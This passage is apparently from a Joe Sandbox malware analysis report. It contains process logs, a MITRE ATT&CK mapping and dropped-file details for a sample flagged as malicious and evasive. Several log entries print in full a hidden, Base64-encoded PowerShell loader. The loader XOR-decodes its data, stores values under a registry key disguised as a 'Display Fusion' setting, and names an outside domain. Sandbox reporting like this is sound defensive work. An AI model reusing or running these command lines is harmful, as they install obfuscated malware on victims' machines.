G4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts111
Command and Scripting Interpreter		Path Interception1
Access Token Manipulation		21
Virtualization/Sandbox Evasion		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local SystemExfiltration Over Other Network MediumData ObfuscationEavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
PowerShell		Boot or Logon Initialization Scripts11
Process Injection		1
Access Token Manipulation		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS2
File and Directory Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

World Map of Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:35.0.0 Citrine
Analysis ID:651250
Start date and time: 23/06/202217:40:552022-06-23 17:40:55 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 3m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultwindowscmdlinecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal52.evad.win@5/2@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 38
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI

Warnings

  • Exclude process from analysis (whitelisted): conhost.exe, svchost.exe
  • Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

TimeTypeDescription
17:42:11API Interceptor5x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASNs

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TVQUNHR0LNB9QC6OSD3M.temp

Download File
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.5809258572265112
Encrypted:false
SSDEEP:96:chQCyhMqbqvsqvJCwoBz8hQCyhMqbqvsEHyqvJCwor/zhkKr+HyklX0lUVLVn:cGGoBz8GeHnor/zhFPklXLVn
MD5:5A8A6BA31F781C9190DAC02A6B2D2F2F
SHA1:62614A67C47E9335DF47D1940EEDF4575799BA10
SHA-256:EB7AB35986BABF60EB66CF9CF66D0B93FB92C370B5EB291733EDA8DAC6AD0A53
SHA-512:34A83CC1A9A34CCADFA0C488EC3FA775D60286BB7C3EDC3C47EF4C8F0156355AA2712ECCB9D20D2CE41DBF98E8C1837D6DEF210BE13B316543574657E7BBC208
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):8016
Entropy (8bit):3.5809258572265112
Encrypted:false
SSDEEP:96:chQCyhMqbqvsqvJCwoBz8hQCyhMqbqvsEHyqvJCwor/zhkKr+HyklX0lUVLVn:cGGoBz8GeHnor/zhFPklXLVn
MD5:5A8A6BA31F781C9190DAC02A6B2D2F2F
SHA1:62614A67C47E9335DF47D1940EEDF4575799BA10
SHA-256:EB7AB35986BABF60EB66CF9CF66D0B93FB92C370B5EB291733EDA8DAC6AD0A53
SHA-512:34A83CC1A9A34CCADFA0C488EC3FA775D60286BB7C3EDC3C47EF4C8F0156355AA2712ECCB9D20D2CE41DBF98E8C1837D6DEF210BE13B316543574657E7BBC208
Malicious:false
Reputation:low
Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

Static File Info

No static file info

Network Behavior

No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Target ID:0
Start time:17:42:08
Start date:23/06/2022
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9A